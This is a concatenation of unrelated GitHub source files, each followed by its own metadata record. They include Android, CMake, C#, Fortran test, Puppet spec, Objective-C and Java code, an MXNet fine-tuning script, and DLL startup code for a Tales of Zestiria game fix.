15,10,21,13,18,12,22,1,9,2,4,11,5,10,1,14,8,2
17,11,22,15,14,10,23,1,11,2,4,11,5,9,1,13,9,1
22,17,17,16,10,15,13,1,7,2,3,14,9,9,2,12,6,2
21,18,18,15,11,15,16,1,7,2,3,14,6,8,2,12,7,2
20,9,16,15,16,6,19,1,7,3,4,14,4,11,1,16,11,3
22,10,17,18,13,6,21,1,8,3,4,13,4,11,1,15,10,3
17,13,14,16,4,9,14,1,13,0,11,13,5,7,1,4,11,5
12,11,9,12,6,5,12,1,9,1,7,12,5,6,0,4,8,2
18,
|
{
"pile_set_name": "Github"
}
| null | null |
<?xml version="1.0" encoding="utf-8"?>
<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:id="@+id/container"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context=".MainActivity" />
|
{
"pile_set_name": "Github"
}
| null | null |
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from .data import DataIngestion
__all__ = ['DataIngestion']
|
{
"pile_set_name": "Github"
}
| null | null |
# Copyright (C) 2006-2020 Istituto Italiano di Tecnologia (IIT)
# All rights reserved.
#
# This software may be modified and distributed under the terms of the
# BSD-3-Clause license. See the accompanying LICENSE file for details.
# FIXME All API should use a YARP_manager_API for __declspec(dllimport/dllexport)
# For now always build the library as STATIC
add_library(YARP_manager STATIC)
add_library(YARP::YARP_manager ALIAS YARP_manager)
set(YARP_manager_HDRS yarp/manager/application.h
yarp/manager/arbitrator.h
yarp/manager/binexparser.h
yarp/manager/broker.h
yarp/manager/data.h
yarp/manager/execstate.h
yarp/manager/executable.h
yarp/manager/fsm.h
yarp/manager/graph.h
yarp/manager/kbase.h
yarp/manager/localbroker.h
yarp/manager/logicresource.h
yarp/manager/manager.h
yarp/manager/manifestloader.h
yarp/manager/module.h
yarp/manager/node.h
yarp/manager/physicresource.h
yarp/manager/primresource.h
yarp/manager/resource.h
yarp/manager/scriptbroker.h
yarp/manager/singleapploader.h
yarp/manager/utility.h
yarp/manager/xmlapploader.h
yarp/manager/xmlclusterloader.h
yarp/manager/xmlappsaver.h
yarp/manager/xmlmodloader.h
yarp/manager/xmlresloader.h
yarp/manager/xmltemploader.h
yarp/manager/yarpbroker.h
yarp/manager/yarpdevbroker.h
yarp/manager/ymm-types.h)
set(YARP_manager_IMPL_HDRS yarp/manager/impl/textparser.h)
set(YARP_manager_SRCS yarp/manager/application.cpp
yarp/manager/arbitrator.cpp
yarp/manager/binexparser.cpp
yarp/manager/broker.cpp
yarp/manager/data.cpp
yarp/manager/execstate.cpp
yarp/manager/executable.cpp
yarp/manager/graph.cpp
yarp/manager/kbase.cpp
yarp/manager/localbroker.cpp
yarp/manager/logicresource.cpp
yarp/manager/manager.cpp
yarp/manager/module.cpp
yarp/manager/node.cpp
yarp/manager/physicresource.cpp
yarp/manager/primresource.cpp
yarp/manager/resource.cpp
yarp/manager/scriptbroker.cpp
yarp/manager/singleapploader.cpp
yarp/manager/utility.cpp
yarp/manager/xmlapploader.cpp
yarp/manager/xmlclusterloader.cpp
yarp/manager/xmlappsaver.cpp
yarp/manager/xmlmodloader.cpp
yarp/manager/xmlresloader.cpp
yarp/manager/xmltemploader.cpp
yarp/manager/yarpbroker.cpp)
source_group(TREE "${CMAKE_CURRENT_SOURCE_DIR}"
PREFIX "Source Files"
FILES ${YARP_manager_SRCS})
source_group(TREE "${CMAKE_CURRENT_SOURCE_DIR}"
PREFIX "Header Files"
FILES ${YARP_manager_HDRS}
${YARP_manager_IMPL_HDRS})
target_sources(YARP_manager PRIVATE ${YARP_manager_SRCS}
${YARP_manager_HDRS}
${YARP_manager_IMPL_HDRS})
target_include_directories(YARP_manager PUBLIC $<BUILD_INTERFACE:${CMAKE_CURRENT_SOURCE_DIR}>
$<INSTALL_INTERFACE:${CMAKE_INSTALL_INCLUDEDIR}>)
if(MSVC)
target_include_directories(YARP_manager SYSTEM PRIVATE ${dirent_INCLUDE_DIRS})
endif()
target_compile_features(YARP_manager PUBLIC cxx_std_14)
target_link_libraries(YARP_manager PUBLIC YARP::YARP_os
PRIVATE YARP::YARP_sig)
list(APPEND YARP_manager_PUBLIC_DEPS YARP_os)
list(APPEND YARP_manager_PRIVATE_DEPS YARP_sig)
if(TARGET YARP::YARP_math)
target_link_libraries(YARP_manager PRIVATE YARP::YARP_math)
target_compile_definitions(YARP_manager PRIVATE WITH_YARPMATH)
list(APPEND YARP_manager_PRIVATE_DEPS YARP_math)
endif()
target_include_directories(YARP_manager SYSTEM PRIVATE ${TinyXML_INCLUDE_DIRS})
target_link_libraries(YARP_manager PRIVATE ${TinyXML_LIBRARIES})
list(APPEND YARP_manager_PRIVATE_DEPS TinyXML)
set_property(TARGET YARP_manager PROPERTY PUBLIC_HEADER ${YARP_manager_HDRS})
set_property(TARGET YARP_manager PROPERTY PRIVATE_HEADER ${YARP_manager_IMPL_HDRS})
set_property(TARGET YARP_manager PROPERTY VERSION ${YARP_VERSION_SHORT})
set_property(TARGET YARP_manager PROPERTY SOVERSION ${YARP_SOVERSION})
set_property(TARGET YARP_manager PROPERTY FOLDER "Libraries/Private")
install(TARGETS YARP_manager
EXPORT YARP_manager
RUNTIME
DESTINATION "${CMAKE_INSTALL_BINDIR}"
COMPONENT YARP_manager
LIBRARY
DESTINATION "${CMAKE_INSTALL_LIBDIR}"
COMPONENT YARP_manager
NAMELINK_COMPONENT YARP_manager-dev
ARCHIVE
DESTINATION "${CMAKE_INSTALL_LIBDIR}"
COMPONENT YARP_manager-dev
PUBLIC_HEADER
DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}/yarp/manager"
COMPONENT YARP_manager-dev
PRIVATE_HEADER
DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}/yarp/manager/impl"
COMPONENT YARP_manager-priv-dev)
set(YARP_manager_PUBLIC_DEPS ${YARP_manager_PUBLIC_DEPS} PARENT_SCOPE)
set(YARP_manager_PRIVATE_DEPS ${YARP_manager_PRIVATE_DEPS} PARENT_SCOPE)
|
{
"pile_set_name": "Github"
}
| null | null |
using System;
using Waher.Security;
namespace Waher.Networking.CoAP.Options
{
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
public abstract class CoapOptionOpaque : CoapOption
{
private byte[] value;
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
public CoapOptionOpaque()
: base()
{
}
/// <summary>
/// Base class for all opaque CoAP options.
/// </summary>
/// <param name="Value">Opaque option value.</param>
public CoapOptionOpaque(byte[] Value)
{
this.value = Value;
}
/// <summary>
/// Gets the option value.
/// </summary>
/// <returns>Binary value. Can be null, if option does not have a value.</returns>
public override byte[] GetValue()
{
return this.value;
}
/// <summary>
/// <see cref="object.ToString()"/>
/// </summary>
public override string ToString()
{
return base.ToString() + " = " + Hashes.BinaryToString(this.value);
}
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
! RUN: %S/test_errors.sh %s %t %f18
! Extended derived types
module m1
type :: t1
integer :: x
!ERROR: Component 'x' is already declared in this derived type
real :: x
end type
end
module m2
type :: t1
integer :: i
end type
type, extends(t1) :: t2
!ERROR: Component 'i' is already declared in a parent of this derived type
integer :: i
end type
end
module m3
type :: t1
end type
type, extends(t1) :: t2
integer :: i
!ERROR: 't1' is a parent type of this type and so cannot be a component
real :: t1
end type
type :: t3
end type
type, extends(t3) :: t4
end type
type, extends(t4) :: t5
!ERROR: 't3' is a parent type of this type and so cannot be a component
real :: t3
end type
end
module m4
type :: t1
integer :: t1
end type
!ERROR: Type cannot be extended as it has a component named 't1'
type, extends(t1) :: t2
end type
end
module m5
type :: t1
integer :: t2
end type
type, extends(t1) :: t2
end type
!ERROR: Type cannot be extended as it has a component named 't2'
type, extends(t2) :: t3
end type
end
module m6
! t1 can be extended if it is known as anything but t3
type :: t1
integer :: t3
end type
type, extends(t1) :: t2
end type
end
subroutine s6
use :: m6, only: t3 => t1
!ERROR: Type cannot be extended as it has a component named 't3'
type, extends(t3) :: t4
end type
end
subroutine r6
use :: m6, only: t5 => t1
type, extends(t5) :: t6
end type
end
module m7
type, private :: t1
integer :: i1
end type
type, extends(t1) :: t2
integer :: i2
integer, private :: i3
end type
end
subroutine s7
use m7
type(t2) :: x
integer :: j
j = x%i2
!ERROR: PRIVATE component 'i3' is only accessible within module 'm7'
j = x%i3
!ERROR: PRIVATE component 't1' is only accessible within module 'm7'
j = x%t1%i1
end
! 7.5.4.8(2)
module m8
type :: t
integer :: i1
integer, private :: i2
end type
type(t) :: y
integer :: a(1)
contains
subroutine s0
type(t) :: x
x = t(i1=2, i2=5) !OK
end
subroutine s1
a = [y%i2] !OK
end subroutine
end
subroutine s8
use m8
type(t) :: x
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
x = t(2, 5)
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
x = t(i1=2, i2=5)
!ERROR: PRIVATE component 'i2' is only accessible within module 'm8'
a = [y%i2]
end
! 7.5.4.8(2)
module m9
interface
module subroutine s()
end subroutine
end interface
type :: t
integer :: i1
integer, private :: i2
end type
end
submodule(m9) sm8
contains
module subroutine s
type(t) :: x
x = t(i1=2, i2=5) !OK
end
end
|
{
"pile_set_name": "Github"
}
| null | null |
require 'puppet'
require 'tempfile'
describe Puppet::Type.type(:file_line) do
let :file_line do
Puppet::Type.type(:file_line).new(:name => 'foo', :line => 'line', :path => '/tmp/path')
end
it 'should accept a line and path' do
file_line[:line] = 'my_line'
file_line[:line].should == 'my_line'
file_line[:path] = '/my/path'
file_line[:path].should == '/my/path'
end
it 'should accept a match regex' do
file_line[:match] = '^foo.*$'
file_line[:match].should == '^foo.*$'
end
it 'should not accept a match regex that does not match the specified line' do
expect {
Puppet::Type.type(:file_line).new(
:name => 'foo',
:path => '/my/path',
:line => 'foo=bar',
:match => '^bar=blah$'
)}.to raise_error(Puppet::Error, /the value must be a regex that matches/)
end
it 'should accept a match regex that does match the specified line' do
expect {
Puppet::Type.type(:file_line).new(
:name => 'foo',
:path => '/my/path',
:line => 'foo=bar',
:match => '^\s*foo=.*$'
)}.not_to raise_error
end
it 'should accept posix filenames' do
file_line[:path] = '/tmp/path'
file_line[:path].should == '/tmp/path'
end
it 'should not accept unqualified path' do
expect { file_line[:path] = 'file' }.to raise_error(Puppet::Error, /File paths must be fully qualified/)
end
it 'should require that a line is specified' do
expect { Puppet::Type.type(:file_line).new(:name => 'foo', :path => '/tmp/file') }.to raise_error(Puppet::Error, /Both line and path are required attributes/)
end
it 'should require that a file is specified' do
expect { Puppet::Type.type(:file_line).new(:name => 'foo', :line => 'path') }.to raise_error(Puppet::Error, /Both line and path are required attributes/)
end
it 'should default to ensure => present' do
file_line[:ensure].should eq :present
end
it "should autorequire the file it manages" do
catalog = Puppet::Resource::Catalog.new
file = Puppet::Type.type(:file).new(:name => "/tmp/path")
catalog.add_resource file
catalog.add_resource file_line
relationship = file_line.autorequire.find do |rel|
(rel.source.to_s == "File[/tmp/path]") and (rel.target.to_s == file_line.to_s)
end
relationship.should be_a Puppet::Relationship
end
it "should not autorequire the file it manages if it is not managed" do
catalog = Puppet::Resource::Catalog.new
catalog.add_resource file_line
file_line.autorequire.should be_empty
end
end
|
{
"pile_set_name": "Github"
}
| null | null |
import { createElement as h } from 'react'
import { AppRegistry } from 'react-native'
import { BrowserRouter } from 'react-router-dom'
import { APP_ID, DATA_KEY } from '@roguejs/app/constants'
import App from './App'
AppRegistry.registerComponent('App', () => {
return props => h(BrowserRouter, {}, h(App, props))
})
AppRegistry.runApplication('App', {
initialProps: typeof window !== 'undefined' ? window[DATA_KEY] : {},
rootTag: document.getElementById(APP_ID),
})
// https://github.com/alidcastano/rogue.js/issues/78
// import hydrate from'@roguejs/app/client.native'
// import App from './App'
// hydrate(App)
if (module.hot) {
module.hot.accept()
}
|
{
"pile_set_name": "Github"
}
| null | null |
org.apache.commons.math3.distribution.HypergeometricDistribution
|
{
"pile_set_name": "Github"
}
| null | null |
<?php
class HTMLPurifier_AttrDef_TextTest extends HTMLPurifier_AttrDefHarness
{
public function test()
{
$this->def = new HTMLPurifier_AttrDef_Text();
$this->assertDef('This is spiffy text!');
$this->assertDef(" Casual\tCDATA parse\ncheck. ", 'Casual CDATA parse check.');
}
}
// vim: et sw=4 sts=4
|
{
"pile_set_name": "Github"
}
| null | null |
//
// UIControl+ActionBlocks.m
// iOS-Categories (https://github.com/shaojiankui/iOS-Categories)
//
// Created by Jakey on 15/5/23.
// Copyright (c) 2015年 www.skyfox.org. All rights reserved.
//
#import "UIControl+ActionBlocks.h"
#import <objc/runtime.h>
static const void *UIControlActionBlockArray = &UIControlActionBlockArray;
@implementation UIControlActionBlockWrapper
- (void)invokeBlock:(id)sender {
if (self.actionBlock) {
self.actionBlock(sender);
}
}
@end
@implementation UIControl (ActionBlocks)
-(void)handleControlEvents:(UIControlEvents)controlEvents withBlock:(UIControlActionBlock)actionBlock {
NSMutableArray *actionBlocksArray = [self actionBlocksArray];
UIControlActionBlockWrapper *blockActionWrapper = [[UIControlActionBlockWrapper alloc] init];
blockActionWrapper.actionBlock = actionBlock;
blockActionWrapper.controlEvents = controlEvents;
[actionBlocksArray addObject:blockActionWrapper];
[self addTarget:blockActionWrapper action:@selector(invokeBlock:) forControlEvents:controlEvents];
}
- (void)removeActionBlocksForControlEvents:(UIControlEvents)controlEvents {
NSMutableArray *actionBlocksArray = [self actionBlocksArray];
NSMutableArray *wrappersToRemove = [NSMutableArray arrayWithCapacity:[actionBlocksArray count]];
[actionBlocksArray enumerateObjectsUsingBlock:^(id obj, NSUInteger idx, BOOL *stop) {
UIControlActionBlockWrapper *wrapperTmp = obj;
if (wrapperTmp.controlEvents == controlEvents) {
[wrappersToRemove addObject:wrapperTmp];
[self removeTarget:wrapperTmp action:@selector(invokeBlock:) forControlEvents:controlEvents];
}
}];
[actionBlocksArray removeObjectsInArray:wrappersToRemove];
}
- (NSMutableArray *)actionBlocksArray {
NSMutableArray *actionBlocksArray = objc_getAssociatedObject(self, UIControlActionBlockArray);
if (!actionBlocksArray) {
actionBlocksArray = [NSMutableArray array];
objc_setAssociatedObject(self, UIControlActionBlockArray, actionBlocksArray, OBJC_ASSOCIATION_RETAIN);
}
return actionBlocksArray;
}
@end
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* <<
* Davinci
* ==
* Copyright (C) 2016 - 2019 EDP
* ==
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* >>
*
*/
package edp.davinci.service;
import edp.core.exception.NotFoundException;
import edp.core.exception.ServerException;
import edp.core.exception.UnAuthorizedExecption;
import edp.davinci.core.service.CheckEntityService;
import edp.davinci.dto.displayDto.*;
import edp.davinci.dto.roleDto.VizVisibility;
import edp.davinci.model.DisplaySlide;
import edp.davinci.model.MemDisplaySlideWidget;
import edp.davinci.model.Role;
import edp.davinci.model.User;
import org.springframework.web.multipart.MultipartFile;
import java.util.List;
public interface DisplaySlideService extends CheckEntityService {
DisplayWithSlides getDisplaySlideList(Long displayId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
SlideWithMem getDisplaySlideMem(Long displayId, Long slideId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
DisplaySlide createDisplaySlide(DisplaySlideCreate displaySlideCreate, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateDisplaySildes(Long displayId, DisplaySlide[] displaySlides, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteDisplaySlide(Long slideId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
List<MemDisplaySlideWidget> addMemDisplaySlideWidgets(Long displayId, Long slideId, MemDisplaySlideWidgetCreate[] slideWidgetCreates, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateMemDisplaySlideWidget(MemDisplaySlideWidget memDisplaySlideWidget, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteMemDisplaySlideWidget(Long relationId, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean deleteDisplaySlideWidgetList(Long displayId, Long slideId, Long[] memIds, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean updateMemDisplaySlideWidgets(Long displayId, Long slideId, MemDisplaySlideWidgetDto[] memDisplaySlideWidgets, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
String uploadSlideBGImage(Long slideId, MultipartFile file, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
String uploadSlideSubWidgetBGImage(Long relationId, MultipartFile file, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
List<Long> getSlideExecludeRoles(Long id);
boolean postSlideVisibility(Role role, VizVisibility vizVisibility, User user) throws NotFoundException, UnAuthorizedExecption, ServerException;
boolean copySlides(Long originDisplayId, Long displayId, User user);
}
|
{
"pile_set_name": "Github"
}
| null | null |
import mxnet as mx
import numpy as np
import os, time, logging, argparse, shutil
from mxnet import gluon, image, init, nd
from mxnet import autograd as ag
from mxnet.gluon import nn
from mxnet.gluon.data.vision import transforms
import gluoncv as gcv
gcv.utils.check_version('0.6.0')
from gluoncv.utils import makedirs
from gluoncv.model_zoo import get_model
def parse_opts():
parser = argparse.ArgumentParser(description='Transfer learning on MINC-2500 dataset',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--data', type=str, default='',
help='directory for the prepared data folder')
parser.add_argument('--model', required=True, type=str,
help='name of the pretrained model from model zoo.')
parser.add_argument('-j', '--workers', dest='num_workers', default=4, type=int,
help='number of preprocessing workers')
parser.add_argument('--num-gpus', default=0, type=int,
help='number of gpus to use, 0 indicates cpu only')
parser.add_argument('--epochs', default=40, type=int,
help='number of training epochs')
parser.add_argument('-b', '--batch-size', default=64, type=int,
help='mini-batch size')
parser.add_argument('--lr', '--learning-rate', default=0.001, type=float,
help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float,
help='momentum')
parser.add_argument('--weight-decay', '--wd', dest='wd', default=1e-4, type=float,
help='weight decay (default: 1e-4)')
parser.add_argument('--lr-factor', default=0.75, type=float,
help='learning rate decay ratio')
parser.add_argument('--lr-steps', default='10,20,30', type=str,
help='list of learning rate decay epochs as in str')
opts = parser.parse_args()
return opts
# Preparation
opts = parse_opts()
classes = 23
model_name = opts.model
epochs = opts.epochs
lr = opts.lr
batch_size = opts.batch_size
momentum = opts.momentum
wd = opts.wd
lr_factor = opts.lr_factor
lr_steps = [int(s) for s in opts.lr_steps.split(',')] + [np.inf]
num_gpus = opts.num_gpus
num_workers = opts.num_workers
ctx = [mx.gpu(i) for i in range(num_gpus)] if num_gpus > 0 else [mx.cpu()]
batch_size = batch_size * max(num_gpus, 1)
logging.basicConfig(level=logging.INFO,
handlers = [logging.StreamHandler()])
train_path = os.path.join(opts.data, 'train')
val_path = os.path.join(opts.data, 'val')
test_path = os.path.join(opts.data, 'test')
jitter_param = 0.4
lighting_param = 0.1
normalize = transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
transform_train = transforms.Compose([
transforms.Resize(480),
transforms.RandomResizedCrop(224),
transforms.RandomFlipLeftRight(),
transforms.RandomColorJitter(brightness=jitter_param, contrast=jitter_param,
saturation=jitter_param),
transforms.RandomLighting(lighting_param),
transforms.ToTensor(),
normalize
])
transform_test = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize
])
def test(net, val_data, ctx):
metric = mx.metric.Accuracy()
for i, batch in enumerate(val_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
outputs = [net(X) for X in data]
metric.update(label, outputs)
return metric.get()
def train(train_path, val_path, test_path):
# Initialize the net with pretrained model
finetune_net = get_model(model_name, pretrained=True)
with finetune_net.name_scope():
finetune_net.output = nn.Dense(classes)
finetune_net.output.initialize(init.Xavier(), ctx = ctx)
finetune_net.collect_params().reset_ctx(ctx)
finetune_net.hybridize()
# Define DataLoader
train_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(train_path).transform_first(transform_train),
batch_size=batch_size, shuffle=True, num_workers=num_workers)
val_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(val_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
test_data = gluon.data.DataLoader(
gluon.data.vision.ImageFolderDataset(test_path).transform_first(transform_test),
batch_size=batch_size, shuffle=False, num_workers = num_workers)
# Define Trainer
trainer = gluon.Trainer(finetune_net.collect_params(), 'sgd', {
'learning_rate': lr, 'momentum': momentum, 'wd': wd})
metric = mx.metric.Accuracy()
L = gluon.loss.SoftmaxCrossEntropyLoss()
lr_counter = 0
num_batch = len(train_data)
# Start Training
for epoch in range(epochs):
if epoch == lr_steps[lr_counter]:
trainer.set_learning_rate(trainer.learning_rate*lr_factor)
lr_counter += 1
tic = time.time()
train_loss = 0
metric.reset()
for i, batch in enumerate(train_data):
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
label = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
with ag.record():
outputs = [finetune_net(X) for X in data]
loss = [L(yhat, y) for yhat, y in zip(outputs, label)]
for l in loss:
l.backward()
trainer.step(batch_size)
train_loss += sum([l.mean().asscalar() for l in loss]) / len(loss)
metric.update(label, outputs)
_, train_acc = metric.get()
train_loss /= num_batch
_, val_acc = test(finetune_net, val_data, ctx)
logging.info('[Epoch %d] Train-acc: %.3f, loss: %.3f | Val-acc: %.3f | time: %.1f' %
(epoch, train_acc, train_loss, val_acc, time.time() - tic))
_, test_acc = test(finetune_net, test_data, ctx)
logging.info('[Finished] Test-acc: %.3f' % (test_acc))
if __name__ == "__main__":
train(train_path, val_path, test_path)
|
{
"pile_set_name": "Github"
}
| null | null |
{
"created_at": "2015-02-27T22:27:51.555394",
"description": "Simple 1-room web chat",
"fork": false,
"full_name": "rick446/Chatterbox",
"language": "Python",
"updated_at": "2015-02-27T23:41:55.318953"
}
|
{
"pile_set_name": "Github"
}
| null | null |
people = [{first_name = "Bruce", last_name = "Springsteen"},
{first_name = "Eric", last_name = "Clapton"},
{first_name = "Bob", last_name = "Seger"}]
|
{
"pile_set_name": "Github"
}
| null | null |
// TR1 cfloat -*- C++ -*-
// Copyright (C) 2006 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the
// terms of the GNU General Public License as published by the
// Free Software Foundation; either version 2, or (at your option)
// any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License along
// with this library; see the file COPYING. If not, write to the Free
// Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
// USA.
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
/** @file tr1/cfloat
* This is a TR1 C++ Library header.
*/
#ifndef _TR1_CFLOAT
#define _TR1_CFLOAT 1
#include <cfloat>
#ifndef DECIMAL_DIG
#define DECIMAL_DIG __DECIMAL_DIG__
#endif
#ifndef FLT_EVAL_METHOD
#define FLT_EVAL_METHOD __FLT_EVAL_METHOD__
#endif
#endif
|
{
"pile_set_name": "Github"
}
| null | null |
/**
* This file is part of Tales of Zestiria "Fix".
*
* Tales of Zestiria "Fix" is free software : you can redistribute it
* and/or modify it under the terms of the GNU General Public License
* as published by The Free Software Foundation, either version 3 of
* the License, or (at your option) any later version.
*
* Tales of Zestiria "Fix" is distributed in the hope that it will be
* useful,
*
* But WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Tales of Zestiria "Fix".
*
* If not, see <http://www.gnu.org/licenses/>.
*
**/
#include <Windows.h>
#include "config.h"
#include "log.h"
#include "sound.h"
#include "framerate.h"
#include "general_io.h"
#include "keyboard.h"
#include "steam.h"
#include "render.h"
#include "scanner.h"
#include "command.h"
#include "hook.h"
#include <process.h>
#pragma comment (lib, "kernel32.lib")
HMODULE hDLLMod = { 0 }; // Handle to SELF
HMODULE hInjectorDLL = { 0 }; // Handle to Special K
typedef HRESULT (__stdcall *SK_UpdateSoftware_pfn)(const wchar_t* wszProduct);
typedef bool (__stdcall *SK_FetchVersionInfo_pfn)(const wchar_t* wszProduct);
std::wstring injector_dll;
typedef void (__stdcall *SKX_SetPluginName_pfn)(std::wstring name);
SKX_SetPluginName_pfn SKX_SetPluginName = nullptr;
unsigned int
WINAPI
DllThread (LPVOID user)
{
std::wstring plugin_name = L"Tales of Zestiria \"Fix\" v " + TZF_VER_STR;
dll_log = TZF_CreateLog (L"logs/tzfix.log");
dll_log->LogEx ( false, L"------- [Tales of Zestiria \"Fix\"] "
L"-------\n" ); // <--- I was bored ;)
dll_log->Log ( L"tzfix.dll Plug-In\n"
L"=========== (Version: v %s) "
L"===========",
TZF_VER_STR.c_str () );
DWORD speedresetcode_addr = 0x0046C0F9; //0x0046C529;
DWORD speedresetcode2_addr = 0x0056EB41; //0x0056E441; 0x217B464
DWORD speedresetcode3_addr = 0x0056E03E; //0x0056D93F;
DWORD limiter_branch_addr = 0x00990F53; //0x00990873;
DWORD aspect_addr = 0x00D52388; //0x00D52398;
DWORD fovy_addr = 0x00D5238C; //0x00D5239C;
if (! TZF_LoadConfig ()) {
config.audio.channels = 8;
config.audio.sample_hz = 48000;
config.audio.compatibility = false;
config.audio.enable_fix = true;
config.framerate.allow_fake_sleep = false;
config.framerate.yield_processor = true;
config.framerate.minimize_latency = false;
config.framerate.speedresetcode_addr = 0x0046C0F9;
config.framerate.speedresetcode2_addr = 0x0056EB41;
config.framerate.speedresetcode3_addr = 0x0056E03E;
config.framerate.limiter_branch_addr = 0x00990873;
config.framerate.disable_limiter = true;
config.framerate.auto_adjust = false;
config.framerate.target = 60;
config.framerate.battle_target = 60;
config.framerate.battle_adaptive = false;
config.framerate.cutscene_target = 30;
config.file_io.capture = false;
config.steam.allow_broadcasts = false;
config.lua.fix_priest = true;
config.render.aspect_ratio = 1.777778f;
config.render.fovy = 0.785398f;
config.render.aspect_addr = 0x00D56494;
config.render.fovy_addr = 0x00D56498;
config.render.blackbar_videos = true;
config.render.aspect_correction = true;
config.render.postproc_ratio = 1.0f;
config.render.shadow_rescale = -2;
config.render.env_shadow_rescale = 0;
config.render.clear_blackbars = true;
config.textures.remaster = true;
config.textures.dump = false;
config.textures.cache = true;
config.textures.gamepad = L"Xbox360";
config.system.injector = injector_dll;
// Save a new config if none exists
TZF_SaveConfig ();
}
config.system.injector = injector_dll;
SKX_SetPluginName =
(SKX_SetPluginName_pfn)
GetProcAddress (hInjectorDLL, "SKX_SetPluginName");
SK_GetCommandProcessor =
(SK_GetCommandProcessor_pfn)
GetProcAddress (hInjectorDLL, "SK_GetCommandProcessor");
//
// If this is NULL, the injector system isn't working right!!!
//
if (SKX_SetPluginName != nullptr)
SKX_SetPluginName (plugin_name.c_str ());
// Locate the gamestate address; having this as the first thing in the log
// file is tremendously handy in identifying which client version a user
// is running.
{
uint8_t sig [] = { 0x74, 0x42, 0xB1, 0x01, 0x38, 0x1D };
uintptr_t addr = (uintptr_t)TZF_Scan (sig, 6);
if (addr != NULL) {
game_state.base_addr = (BYTE *)(*(DWORD *)(addr + 6) - 0x13);
dll_log->Log (L"[ Sig Scan ] Scanned Gamestate Address: %06Xh", game_state.base_addr);
}
}
if (TZF_Init_MinHook () == MH_OK) {
extern void TZFix_ImGui_Init (void);
TZFix_ImGui_Init ();
CoInitializeEx (nullptr, COINIT_MULTITHREADED);
tzf::SoundFix::Init ();
tzf::FileIO::Init ();
tzf::SteamFix::Init ();
tzf::RenderFix::Init ();
tzf::FrameRateFix::Init ();
tzf::KeyboardFix::Init ();
TZF_ApplyQueuedHooks ();
// Uncomment this when spawning a thread
//CoUninitialize ();
}
SK_UpdateSoftware_pfn SK_UpdateSoftware =
(SK_UpdateSoftware_pfn)
GetProcAddress ( hInjectorDLL,
"SK_UpdateSoftware" );
SK_FetchVersionInfo_pfn SK_FetchVersionInfo =
(SK_FetchVersionInfo_pfn)
GetProcAddress ( hInjectorDLL,
"SK_FetchVersionInfo" );
if (! wcsstr (injector_dll.c_str (), L"SpecialK")) {
if ( SK_FetchVersionInfo != nullptr &&
SK_UpdateSoftware != nullptr ) {
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Copyright (C) 2013-2018 yvolk (Yuri Volkov), http://yurivolkov.com
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.andstatus.app.timeline.meta;
import android.content.Context;
import androidx.annotation.NonNull;
import androidx.annotation.StringRes;
